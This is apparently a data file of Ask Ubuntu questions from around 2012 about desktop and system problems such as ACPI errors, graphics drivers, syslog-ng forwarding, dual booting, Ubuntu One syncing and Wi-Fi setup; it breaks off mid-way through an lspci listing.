149028	is an acpi gpe storm normal in an ubuntu session ?	in a previous question ( what is an acpi gpe storm ? ) , i asked about acpi gpe storm . looking closer to my kern.log file in /var/log/ , i notice that in every session at some point ( usually withing 20 ' after startup ) a gpe storm is triggered . when i open kern.log immediately after startup , and wait for a storm to come up , i see that it can be triggered by anything ( a copy-action , the opening of an app like firefox or thunderbird , etc ... ) . this worries me , since the answer i got for my previous question confirms this can threaten stability and might be a sign of hardware malfunction . looking for other acpi related events in kern.log , i find the error messages below . i hope someone can give some advice : jun 10 16:33:20 guy-vaio kernel : [ 0.724505 ] acpi fadt declares the system does n't support pcie aspm , so disable it jun 10 16:33:20 guy-vaio kernel : [ 0.795205 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored jun 10 16:33:20 guy-vaio kernel : [ 1.024009 ] acpi : deprecated procfs i/f for battery is loaded , please retry with config_acpi_procfs_power cleared jun 10 16:33:20 guy-vaio kernel : [ 23.140259 ] [ firmware bug ] : acpi ( vga ) defines _dod but not _dos i 'm experiencing frequent ( several times /d ) application crashes , that seem random so not in particular apps , and less frequent ( once a week or so ) complete system freezes where the system becomes unresponsive to keyboard , mouse or touchpad input and the only solution is a hard reboot ( press start button ) . my questions : what about the firmware bugs in acpi ? how and where do i have to 'clear config_acpi_procfs_power ' ? ubuntu 12.04 , 64-bit , 3.2.0-25-generic kernel , intel® core™ i5-2430m cpu @ 2.40ghz × 4
149030	forward mysql logs to syslog-ng	ubuntu 10.04 i have set mysql to log slow queries and a general mysql log . how can i pipe those files in syslog to forward to centralized logging service ( which is working ) ? tried : source s_mysql_instance_1 { pipe ( `` /var/log/mysql/mysql.log '' ) ; } ; log { source ( s_mysql_instance_1 ) ; destination ( d_loggly ) ; } ; get : error opening file for reading ; filename='/var/log/mysql/mysql.log ' , error='permission denied ( 13 ) ' error initializing source driver ; source='s_mysql_instance_1 ' , id='s_mysql_instance_1 # 0' error initializing message pipeline ; i have also disabled apparmor and still get the same results
149031	does using both tmpfs and zram make any sense ?	i wondered if tmpfs and zram do negatively interfere with each other in any way ? after what i 've read about it i 'm unsure whether there is a positive cumulative effect accomplishable with that combination . has someone made experiences with that combination ? thank you in advance for useful answers !
149033	i have ubuntu 11.10 and for no apparent reason my sidebar suddenly will not hide , how can i reverse this ?	i have ubuntu 11.10 and for no apparent reason my sidebar suddenly will not hide , i did not go into system settings or anything like that . i googled this , but everything i found had me downloading something to be able to fix it . however , as it changed without me downloading anything , i 'm hoping it 's possible to change it back without downloading anything . i read somewhere that i should go into `` system setting '' , `` appearance '' , `` behaviour '' and change it to `` auto-hide '' , but i did not have a `` behaviour '' tab in `` appearance '' . i would normally be able to just deal with it , but it is preventing me from being able to click the `` back '' button when i am in a browser . does anyone
149035	netbeans shows only blank window	i am not able to launch netbeans . when i launch it for the first time i normally get the netbeans splash screen , but after that nothing happens . when i try to launch it again , a small blank window appears . i am able to enlarge the window , but it is completely blank . i am using openjdk-6 . any ideas ? as far as i remember this did n't come after some update/new install or whatever . netbeans worked perfectly , but then all from the sudden ... edit when run in terminal : when run for the first time : $ /opt/netbeans-7.1.2/bin/netbeans 10.6.2012 19:00:26 org.openide.filesystems.fileutil normalizefileimpl warning : fileutil.normalizefile ( /home/tomas/.netbeans/7.1.2 ) took 569 ms . result is /home/tomas/.netbeans/7.1.2 then it just hangs . it does n't quit , it just stays . if i exit ( ctrl+c ) and start over again , i get the splash screen , but then again it hangs . when run again , while another instance is running : no output in terminal - just the blank screen .
149036	i have ubuntu 12.04 installed , i want a windows 7 dual boot , but i dont have windows 7 iso	present status : ubuntu 12.04 installed and working . want to install windows 7 , keeping it a dual boot . i have only installation files of windows 7 . what should i do ?
149043	is there any way to add the toolbar at the bottom of the new firefox start page to the ubuntu start page ?	is there any way to add the toolbar at the bottom of the new firefox 13 start page to the firefox for ubuntu start page ? i 'm running ubuntu 12.04 64bit .
149048	libjpeg.so.62 : can not open shared object file : no such file or directory	i am trying to install hacketyhack software : http : //hackety.com/ but i get an issue when installing thir script , libjpeg.so.62 : can not open shared object file : no such file or directory i checked in synaptics and it is already installed , do you have any advice ? i 'm on ubuntu 12.04 .
149054	how to change lcd brightness from command line ( or via script ) ?	to work around bug # 1005495 ( changing lcd brightness via hotkeys impossible ) , i 'd like to have one command line query for increasing and one for reducing the brightness of my lcd . i could then map a hotkey to each one of this queries . the problem is : i do n't know how to increase and reduce the lcd brightness on the command line . do you ?
149056	how to find an ubuntu password which i removed ?	i removed my password from the user menu where they gave the option for no password . so i pressed that and now the computer can be logged into but they ask a password which is not my old password ... .what should i do ? i am quite new to ubuntu ... .
149058	how can i add a desktop/gui to a command-line ubuntu installation ?	i had installed ubuntu on a vm , with a command-line only interface , now i have had enough of command-line interface experience and plan to proceed with gui mode . but i dont want to install a fresh copy of ubuntu with gui mode ; i want my current [ cli ] to have gui . i have ubuntu 12.04 lts installed as cli , and desired to have some light-weight ( less resource consuming , slow-system friendly ) gui . what are my options and how can i accomplish this ?
149060	what is show state icon in omnibox in google chrome ?	what is show state icon in omnibox in google chrome ? during the installation of plugin for backspace key , i found there `` backspace shortcuts for linux '' i found there three options viz . activate backspace for navigation in history object show state icon on omnibox close actual tab on top of history object ( experimental ) what does the `` show state icon on omnibox '' there ?
149067	are there any gedit plugins for rails	i have watched some video tutorials for rails and spotted gedit as very good editor for ruby on rails development . i installed gmate and some plugins for programming ( autocomplete and intelligent text completion ) but i still can not achieve what this guy has on video at 5.18 http : //www.youtube.com/watch ? v=g3suv-a9bak when he types def index , it automatically adds code for whole method stub . does anyone knows which plugin is this ? if you know any other plugins that can provide more comfortable rails programming , they are welcome .
149071	why i am getting a fresh new installed ubuntu 12.04 on each restart ?	why i am getting a fresh new installed ubuntu 12.04 on each restart ? every time i turnoff my laptop and start it again or restart , i get a fresh copy of ubuntu 12.04 as i 'd installed it.even my folders made on desktop does n't stay there. ! why it is happening ? : -o i am using hp-pavilion-notebook-g6-1004tx please help me to come out of this problem .
149075	mount /tmp and /home to separate hard drive	is it possible to mount the root file system '/ ' on one hard drive ( where folders like /usr , /boot , etc will be stored ) and mount /tmp and /home to another hard drive on the same partition ? something like this : hdd1 : / /usr /bin /boot /var hdd2 : /tmp /home i know lvm is possible for creating a single large volume but that is not what i want
149082	how to install and use nimbuzz !	i am a very big fan and user of nimbuzz ! , an im client . please tell me how to use it in ubuntu 12.04 lts ?
149085	how to prevent ubuntu one from deleting files	i want ubuntu one to sync existing and new files or directories , but not delete existing files or directories . i use ubuntu one on windows and ubuntu . the last days i 've had multiple times that ubuntu one decided to delete all my files . fortunately i had just backed up my files and made a local copy of the deleted files . still , i have no confidence anymore that ubuntu one will safely store my files without suddenly deleting them . so i wondered if there is an option to prevent ubuntu one deleting any files , always keeping a copy of the file in the cloud , even when i delete the file on my computer .
149089	ca n't open youtube or vimeo	i ca n't open youtube.com on computer with lubuntu and mint . i see that my flash works properly on other sites . problem is in for example on youtube ( yming.com loading without endless ) and vimeo . i tried to use firefox and chromium . i thought that it would be problem with dns ( i have dns from dhcp - opendns ) so i changed to google dns but it did n't help to solve problem . when i use text browser - links these site are opening well in text mode . i think that the problem is with flash or java . on other computer with windows connected to the same network these sites are being opened without problem . i am on the point that i do n't know what to do next , because i tried to install and uninstall flash several times . i tried flash-aid as well .
149090	partition showing up twice under devices	i have an ntfs data partition on the same drive as my ubuntu 12.04 ( precise pangolin ) partition . i wanted to have this partition automatically mount at startup so that dropbox can start synchronising at startup without me having to manually mount it ( my dropbox folder is on the partition ) . i edited the fstab file by appending the following to it : # data-partition uuid=762639de416d0a21 /media/data ntfs-3g rw , auto , users , exec , nls=utf8 , umask=003 , gid=46 , uid=1000 0 2 the drive now automounts at startup like i wanted , but now i have a duplicate data entry under my devices list . this only appeared after editing the fstab file . the second data entry under devices does not mount properly , and i do not want it there . why is this duplicate entry there , and how can i get rid of it ? additional information : here is the output i get from cat /proc/partitions : major minor # blocks name 8 0 976762584 sda 8 1 102400 sda1 8 2 111574016 sda2 8 3 803643392 sda3 8 4 1 sda4 8 5 55410688 sda5 8 6 6028288 sda6 11 0 1048575 sr0
149096	how to disable `` system problem detected '' notification	after installing the bumblebee drivers my system started reporting `` system problem detected '' around every hour . i already reported the error and am not very concerned about fixing it , because everything works fine . how can i disable this notification ?
149098	is it possible to use back in time with ubuntu one without storing the back up files locally ?	i use deja dup as my back up tool . love its simplicity and the fact that i can store my back up directly on my ubuntu one account . now i really like the flexibility of back in time , but i can not find a clean way to store my back up in ubuntu one . some threads suggest to use the ubuntu one folder in your system , and that works , but it also keeps a local copy of the back up in my system , and i do not want that . any work around for this ? thanks in advance
149101	oil rush commercial ppa problem	i have bought oil rush from the ubuntu software center but it wo n't install and it 's not in the `` private ppa access '' -list . the ppa just do n't work . and i do n't see oil rush in synaptic .
149104	how do i search files from a different partition using the dash	i recently created a soft link to my windows music folder so that whenever i click the music folder on wbuntu , it 'll take me to my music on windows . whenever i try to search my music using the dash though , nothing pops up . is there a way to index these files so that they are included when i try to search my music ? thank you
149107	archive error with every download	ubuntu wont let me download anything at all , not from ubuntu or the internet . every time i try it keeps popping up this : archive : /home/dave/downloads/itunes64setup.exe [ /home/dave/downloads/itunes64setup.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/dave/downloads/itunes64setup.exe or /home/dave/downloads/itunes64setup.exe.zip , and can not find /home/dave/downloads/itunes64setup.exe.zip , period . can anyone help me ?
149111	hide backup folder from dash quickstart	i have a nfs file share where i put all my files ( nas storage ) i also have a backup routine that copies the nfs file share to a local folder when i now start a file using the dash the system finds both the nfs shared file and the on in backup folder , how to disable the backup folder ?
149115	loading splash screen takes priority over terminal or windows manager while running elsa	i recently installed e17 and was trying to set up defaults to use elsa and ecomorph over the standard compiz as it constantly crashes since updating to 12.04 . if elsa is installed the loading screen hangs and never loads to login , however i can get to a terminal or the e17 login instead of the standard gdm that usually shows up , within a second the screen goes back to the loading screen . i can still type and login as well as run commands in the terminal , but all i see is the loading screen . switching between terminals i can confirm my commands before it switches back to the loading screen . if i remove elsa the loading screen hangs , but i can get to a terminal login and run lightdm to start my session with no problems . i have multiple de installed and am unsure which loading screen is coming up . i think it 's the kde screen , grub comes up with a debian background if that helps . i 'm not sure if i can switch the loading screen and resolve this issue or if i 'm just going to have to scrap using elsa and get lightdm to load on boot again . elsa would be my preference . i do n't have the space to backup my files for a complete reinstall . please help !
149121	how do i restore operation of the shutdown menu	my shutdown menu stopped responding to the mouse click . how should ubuntu be shutdown at this point ? i 'm on 12.04 ( precise ) .
149124	how do i remove a folder from the ubuntu one `` folders '' tab	how do i remove a local folder from ubuntu one operation ? i unchecked the `` sync locally ? '' checkbox , whatever that happens to mean . i prefer to just get rid of it from the ubuntu one dashboard .
149125	how to use dict/words ?	i need to use the file 'words ' , but i ca n't find it . this shows a red file called 'words ' , which i think is a broken link : ls /usr/share/dict what can i do ?
149139	ubuntu 12.04 fails to find intel hd graphics 3000	on my windows 7 installation an intel hd graphics 3000 card/driver shows . however in ubuntu 12.04 , system â administration â hardware drivers shows no proprietary drivers available for the system . i have tried running the following : sudo apt-get install mesa-utils which results in the graphics driver incorrectly identifying itself as sandy bridge mobile . running the following results in no change sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update & & sudo apt-get upgrade sudo reboot does anybody have any information on this behavior ?
149140	2 hard drives.one partition	i have two hard drives ( one 500 gb and the other 750 gb ) . i would like to create a single partition which will include these 2 hard drives . i guess it works only with identical hard drives , correct me if i am wrong . i have these 2 drives at an old computer which i tuned and may turn it into a web server , so i 'm going to install ubuntu on them . how can i make 2 or more hard drives behave as one in one partition ?
149142	need help with creating a form with kbasic	i have installed kbasic on my ubuntu to create a simple form ( as of now ) which will have a database backend . the problem is , as per the kbasic help , i have to click on any component i want for eg button n then click on the form where i want to add it ... fairly simple ... like vb ... but , its not happening ! i click on it and then on the form , but i do not get anything on the form ! can anyone help me with how to do it ?
149150	error - 'nonetype ' object has no attribute 'get_info ' during xubuntu installation	i 'm trying to install xubuntu-12.04-desktop-i386 to my old asus eee pc amd athlon processor 1.00 ghz , 992mb ram , windows xp and i get this error during installation : error - 'nonetype ' object has no attribute 'get_info' any help ? thanks !
149151	how to make krusader to show file name with extensions ?	are there any settings that can make krusader show file name with extensions after it ( instead of just show file name and the extension is in a separate column ) ? having examined each and every setting items in all windows and tabs of konfigurator , i simply can not find the way to do it .
149152	block-level deduplicating filesystem	i 'm looking for a deduplicating copy-on-write filesystem solution for general user data such as /home and backups of it . it should use online/inline/synchronous deduplication at the block-level using secure hashing ( for negligible chance of collisions ) such as sha256 or tth . duplicate blocks need not even touch the disk . the idea is that i should be able to just copy /home/ < user > to an external hdd with the same such filesystem to do a backup . simple . no messing around with incremental backups where corruption to any of the snapshots will nearly always break all later snapshots , and no need to use a specific tool to delete or 'checkout ' a snapshot . everything should simply be done from the file browser without worry . can you imagine how easy this would be ? i 'd never have to think twice about backing-up again ! i do n't mind a performance hit , reliability is the main concern . although , with specific implementations of cp , mv and scp , and a file browser plugin , these operations would be very fast , especially when there is a lot of duplication as they would only need to transfer the absent blocks . accidentally using conventional copy tools that do not integrate with the fs would merely take longer , waste some bandwidth when copying remotely and waste some cpu , as the duplicate data would be re-read , re-transferred and re-hashed ( although nothing would be re-written ) , but would absolutely not corrupt anything . ( some filesharing software may also be able to benefit by integrating with the fs . ) so what 's the best way of doing this ? i 've looked at some options : lessfs - looks unmaintained . any good ? opendedup/sdfs - java ? could i use this on android ? ! what does sdfs stand for ? btrfs - some patches floating around on mailing list archives , but no real support . zfs - hopefully they 'll one day relicense under a true free/opensource gpl-compatible licence . also , 2 years ago i had a go at an attempt in python using fuse at the file-level to be used over the top of a typical solid fs such as ext4 , but i found fuse for python underdocumented and did n't manage to implement all of the system calls .
149153	how do you edit the `` preferred format '' settings in rhythmbox ?	in rhythmbox 's preferences , you can change the `` preferred format '' for music to mpeg layer 3 audio , ogg vorbis , flac , or mpeg 4 audio . however , despite there being a settings button , it does not become enabled for any of these choices . ( i have installed all of the gstreamer plugins , but this has made no difference . ) so how can you change the `` preferred format '' , for example to change the bit rate or the quality setting ?
149154	how do i find a proprietary driver for the intel graphics card i have ?	i have an intel corporation core processor integrated graphics controller ( rev 18 ) , and i am trying to get a proprietary driver for my graphics card so i can play amnesia from the humble bundle . i am a female that can easily follow directions but does n't know much about linux yet . if you give me precise directions , i will follow them so you can help me fix the problem . i would really appreciate it ! my laptop is a dell n7010 . additional info : i believe that it is the graphics card that is causing amnesia to crash , but i am unsure . i have tried running it on the lowest possible settings , and it crashes after the first loading screen . : ( also , i installed via the ubuntu software center after purchasing the humble bundle . i have not tried the other games yet .
149163	why does trying to build a kernel module give me a `` -1 unknown symbol '' error ?	i recently purchased a kinect for windows and quickly discovered that the camera drivers included in linux kernel 3.0+ are n't compatible with the kinect for windows hardware revision . after looking at the source code it seems like a tiny modification is all that is required for compatibility , so i 've been trying to recompile the driver - to no avail . i 've been referring to this article and this one as well , though they are a bit outdated . when i try to compile the module , i get an error because the header file `` gspca.h '' ca n't be found in the include path . i located the missing header in my filesystem , but the file itself is empty . i 've also tried downloading the kernel source ( 3.2.0-24-generic ) , which allowed me to compile the module , but when i load the module i get an error . -1 unknown symbol in module is there a standard way to go about this without first building the kernel ? will building the kernel ensure that i can build the module ? thanks
149168	will the rosetta stone online edition work with ubuntu ?	the rosetta stone online edition claims that it requires : windows : xp sp3 , vista sp2 , or windows 7 mac ( intel based only ) : leopard , snow leopard , or lion ( os x 10.5 or higher ) internet explorer 7 , firefox 3 , safari 3 , chrome 8 or greater adobe flash player version 10.1 or greater yet , i would guess if it works on chrome and firefox and only requires flash versoin 10.1 , it 'd work on ubuntu too ... can anyone confirm ? please no speculating , only answer if you can confirm or deny it works .
149170	all my ubuntu vms have apt-get update problems	i 'm running virtualbox 4.1 on an x86_64 windows 7 host . i 've got a collection of 12.04 and 10.04 lts vms i use to create debs for work . in the last week i started noticing problems on the 12.04 vms . tried the usual apt-get clean bit which did n't help . i rolled a new 11.10 vm for testing a worpress upgrade . this vm has never been able to run apt-get update without errors . the interesting errors look like this : get : 8 http : //security.ubuntu.com oneiric-security/main translation-en_us [ 344 b ] 14 % [ 7 sources 48686/877 kb 6 % ] [ waiting for headers ] bzip2 : ( stdin ) is not a bzip2 file . hit http : //security.ubuntu.com oneiric-security/multiverse translation-en hit http : //security.ubuntu.com oneiric-security/restricted translation-en hit http : //security.ubuntu.com oneiric-security/universe translation-en 22 % [ 7 sources 127526/877 kb 15 % ] [ waiting for headers ] /usr/bin/xz : ( stdin ) : file format not recognized and ends with /usr/bin/xz : ( stdin ) : file format not recognized ign http : //us.archive.ubuntu.com oneiric/main translation-en_us ign http : //us.archive.ubuntu.com oneiric-updates/main translation-en_us fetched 18.5 mb in 47s ( 392 kb/s ) w : gpg error : http : //us.archive.ubuntu.com oneiric inrelease : file /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_oneiric_inrelease does n't start with a clearsigned message w : gpg error : http : //security.ubuntu.com oneiric-security inrelease : file /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_oneiric-security_inrelease does n't start with a clearsigned message xv-utils , lzma , etc are all installed . i 've reinstalled the vm from scratch three times and up at the same point .
149176	is is possible to get a patch included in the current release ? if so , how ?	so a while back i reported a bug in compiz 's place window plugin . it 's a fairly major regression for people affected by it : mainly those using gnome-fallback , judging by the reports . a patch surfaced a short time later . i created a ppa for testing and everybody involved so far is reporting the issues are fixed . it even fixes another bug . i 've done testing with a standard unity desktop and can say ( for my testing ) no adverse effects were visible . i want to get this pushed to ubuntu right now for two main reasons : i 'm selfish . i do n't want to need to update my ppa every time a new version of compiz is pushed to 12.04 . i do n't want ubuntu users seeing their windows flying around because of a silly little bug . i want this patch pushed to ubuntu 's version of compiz as soon as possible , so we can mark these bugs fixed and move on with our lives . whose leg do i have to hump to get this pulled into ubuntu right now ? i do n't maintain this project and it 's an upstream thing but it 's fairly integral to ubuntu . i could go to compiz but i imagine that if they accept the patch , it 'll be months ( at least a release ) before it 's anywhere near ubuntu . and when i do find the right person , how can i make the process as slick as possible for them ? i want them to see my request , go `` yup , that all looks great , done '' and that be it . i do n't want seventeen rounds of emails addressing aspects of the patch . more importantly , i do n't want to waste their time either . and what do i have to provide them ? my packaging skills are ... lamentable . this was my first attempt at patching a package for redistribution so i 've probably made every single packaging error known to man . will they be happy with the original patch ( so they can apply it themselves ) or should i repackage things so the diff/changelog is a little cleaner ( it took me a few goes and the versioning is all over the place ) . note : this question is about compiz but i 'd prefer if answers could address other styles of package too so we have an authoritative and comprehensive thread of how to get things fixed .
149177	12.04 - sound is laggy when running games through wine	lenovo u400 wine 1.5.5 ubuntu 12.04 with all updates applied i 'm experiencing severe ( ~500ms ) audio lag in all games run in wine . portal 2 , half-life , world of goo , and fallout are all exhibiting this problem . when i run winecfg though and click the `` test sound '' button at the bottom of the audio tab , the sound effect appears to play immediately . so i 'm not sure what 's going on . i do n't think it 's a problem with pulseaudio by itself since totem videos and youtube clips both play in perfect sync . anyone have any ideas on where to start fixing this ? thanks ! ( edit : i thought this was limited to steam games but i installed a non-steam game and i now see that 's not the case . i get audio lag in other apps too . )
149185	does ubuntu reduce cpu usage due to overheating ?	i have been running for a day at 100 % cpu and suddenly seems that for the same tasks as before its usage has been limited to 50 % . i suspect that overheating may be the cause . i am using 11.10 . is this throttle automated ?
149196	can i use another computer as a second monitor ?	is there a way to extend my desktop 's screen onto my laptop 's display , as if the laptop was just another monitor in a dual-monitor configuration ? maybe with some combination of vnc and synergy ?
149200	setting up a pppoe internet connection in ubuntu 12.04	i 've been trying to set up my internet connection and router with ubuntu 12.04 and i 've been having some issues . i am currently trying to connect directly through my modem using the pppoe username and password provided by my isp . i ran sudo pppoeconf and input my information but was still unable to connect . furthermore , my computer is now unable to connect to my wired network and upon startup spends about 5 minutes configuring network options before allowing 60 seconds to complete its task and eventually booting without all networks properly configured . i am new to ubuntu and linux and any beginner friendly help that you could provide would be greatly appreciated . edit : i am still unable to connect to the internet and i 've grown to accept that ubuntu wo n't successfully interface with my japanese modem , but i was wondering if there was any way to avoid the 'configuring networks ' delay on boot that i have been experiencing .
149203	how do i choose a resolution ?	i have 2 monitors . the display settings tool says the resolution of both monitors is 1280x1024 , but one of them is actually using 1024x768 , and scaling everything down to fit . now the text looked ugly ! how do i set the resolution of both monitors to 1280x1024 ? obviously , selecting `` 1280x1024 ( 5:4 ) '' for both monitors did n't work .
149206	how to install nvidia.run ?	i have a nvidia ge force ge6150 se graphics card . i am running ubuntu 12.04 . when i try to install the .run file it fails . it shows the message like this : i itried to install it after uninstalling the old driver.still same message . here is the log file . nvidia-installer log file '/var/log/nvidia-installer.log' creation time : mon jun 11 05:46:17 2012 installer version : 295.53 path : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games nvidia-installer command line : ./nvidia-installer using : nvidia-installer ncurses user interface - > the file '/tmp/.x0-lock ' exists and appears to contain the process id '1062 ' of a > runnning x server . error : you appear to be running an x server ; please exit x before installing . for > further details , please see the section installing the nvidia driver in the readme > available on the linux driver download page at www.nvidia.com . error : installation has failed . please see the file '/var/log/nvidia-installer.log ' > for details . you may find suggestions on fixing installation problems in the readme > available on the linux driver download page at www.nvidia.com . but no such file is shown in the process manager . help me ! !
149207	installed ubuntu sucssessfully , but now wo n't boot	my windows vista had some issues and would freeze after few minutes each time . so decided to install ubuntu . first copied the ubuntu .iso file to a usb drive and tried to install - did not work . then installed linuxlive usb creator on another machine , and ran that . now my usb had the .iso file & other generated files . now on windows vista machine , change the boot order to usb and then tried again . now it took me to the ubuntu installation page and continued from there . i chose the erase disk and install ubuntu option . installation was successful . i also noticed a warning message about low disk level or something like that , but my machine has 250 gig . so not sure why . then restarted the machine , it is not working . i again went and changed the boot order , but still does n't work . edit : i removed the usb drive before restart . would that be an issue ? any help on this would be much appreciated . thanks so much harish
149214	copy skype chat history to text files ?	i 'd like to convert my skype chat history to a collection of text files for archival purposes . ideally , i 'd like to have a command ( e.g . script or app ) so that i could do this on a regular basis . any one have any idea on how to go about doing this ?
149215	switched to ubuntu from windows but the network is still a windows network	i was dual booting windows 7 and ubuntu on my desktop . i configured a tp-link wr940n router from the windows 7 desktop , and i 'd use a windows 7 laptop via wifi . i just wiped windows and installed ubuntu 12.04 on both the desktop and the laptop . no problem connecting to the internet , whether on the ubuntu desktop or the ubuntu laptop ( through wifi ) but the network definition is still a 'windows ' network , and i 'm not able to see one computer from the other . i guess the router is just doing it 's thing , as if nothing changed . what do i need to do to have a regular home network ?
149218	virtualbox : how do i ping a windows guest from the ubuntu ?	i use ubuntu 12.04 ( 64-bit ) as host os and windows 7 as guest os . how can i ping the windows 7 system from ubuntu ? and is that possible even when internet is off ?
149220	will not install on my laptop	tried installing it every which way , none of them even get me to choose language screen . each method turns the screen black after just a few seconds and then nothing ever happens until i turn the computer off and back on .
149223	how to fix ubuntu 12.04 boot , using windows xp ?	i installed ubuntu 12.04 from usb . now there is no option to choose linux or windows , because the boot-loader is missing . can i repair this using windows xp , without using ubuntu or a virtual machine ? is there is any software for windows xp ( to act as boot-loader ) ?
149226	new software on ubuntu hardy heron ( 8.04 )	i am using ubuntu 8.04 because of my hardware restrictions . i followed the steps to install latest firefox as i can use but i get firefox 3.6 could not found response : for ubuntu 8.04 ( hardy ) users deb http : //ppa.launchpad.net/ubuntu-mozilla-daily/ppa/ubuntu hardy main deb-src http : //ppa.launchpad.net/ubuntu-mozilla-daily/ppa/ubuntu hardy main save and exit the file now you need to add ppa gpg key sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 247510be update the source list sudo apt-get update install firefox 3.6 sudo apt-get install firefox-3.6 if you already have a version of firefox 3.5 installed from a repo then upgrade using the following command sudo apt-get upgrade
149240	how do i add and call a helper script in a juju charm ?	i have a charm where i 'd like to be able to call a small python script in one of the hooks as part of its execution . where do i put that helper script ? can i put it in the hooks directory and get it included ? then , once it is transfered to the remote machine , where is it located so that i can execute it ?
149242	is it possible to power up ports on a usb hub from ubuntu ?	i have a d-link dub-h7 powered usb 2.0 hub connected to my computer . occasionally when i reboot the system , i 've noticed that some of the ports on the hub get powered down : the green light next to the port is turned off , and the device attached to that port is not visible to lsusb or similar commands . devices attached to the other ports on the hub function as normal . i am able to restore the ports by disconnecting power to the hub temporarily ( from the computer , ac adapter and any devices that might provide any power such as my phone ) , but this is a bit of a hassle . it seems like something that might be related to power management , so is there some way you can tell the usb hub to power up through software ?
149243	accidentally deleted /etc/rc0.d and /etc/rc1.d and can not boot	i deleted /etc/rc0.d and /etc/rc1.d and i do n't know what i lost . i know this is where my auto-start script live . is there anyway to get these directories back ? also , there seems to be 4 or so other etc/rc ? .d directories that are remaining . are any of these backups ? will my system survive ? update : i restarted my system , now it wo n't load past the purple ubuntu screen . i 'm using ubuntu 12.04 .
149244	`` restart to complete updates '' message remains after reboot	no matter how many times i restart my computer i keep getting this message `` restart to complete updates '' . can you please suggest what to look for and how to fix the problem ?
149257	where are the configuration file for setting login screen , grub background and other customizeables ?	i 'm looking to customize different aspects of ubuntu and really do n't know where to start any help will be appreciated .
149258	dell n5110 touch pad scroll bar not recognized in ubuntu 12.0.4	i bought recently my dell n 5110 and installed ubuntu 12.0.4 lst x 64 bit along with windows 7 . the problem i am facing is my touch pad is not recognized in ubuntu and tried installing alps ( as i found some where in ubuntu forums but did n't worked well to the surprise it deleted even my touchpad which is working as mouse ) . if any body having any idea on how sort out this issue please help me ... i 'm getting sick of each time holding and dragging my pages . the result of xinput list is ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys thanks in advance
149267	ddrescue : safe to stop while `` splitting failed blocks '' ?	trying to clone a failing disk with ddrescue sudo ddrescue -r 3 /path/to/home /destination/ logfile it 's been running for about 10 days ! now it 's splitting failed blocks and has n't read anything successfully for the past two days . is it safe to ctrl+c ddrescue now ? will the so-far rescued image be usable if i do so ?
149271	how to change default scaling governor back to ondemand	after playing with grub profiling and installing preload , default scaling governor suddenly becomes 'performance ' not 'ondemand ' . i tried to enable /etc/init.d/ondemand service , but nothing changes - after reboot or resume , governor is always 'performance ' . do anybody knows what happened and how to revert old behaviour . i 'm using hp 6710s laptop .
149274	brightness level is not restored back after some idle time when using fglrx	i have a laptop powered by fresh installation of ubuntu 12.04 with xfce . before i have used a default opensource ati driver . for several days i have been using fglrx . after some time of inactivity the brightness of display is automatically reduced to a minimal level . when i return back to the laptop by pressing any key or by moving mouse , the brightness level is automatically set to the largest ( ! ) one . it really annoys . do i understand correctly that the idle timeout is managed by x.org/dpms settings ? who control the level of brightness which is restored after inactivity ? i have not managed to find such settings in the control panel of ati . i really want to change them . there were no such problem with the opensource driver . laptop-tools are disabled .
149277	can not get wireless internet to work	i have a toshiba satellite a205 s5816 . i can not for the life of me get the wifi to work . it worked fine when i had windows vista installed . here is the output of lspci . i do n't think it recognizes any of the drivers i 've tried to install . 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 03 ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 3 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f3 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] ( rev 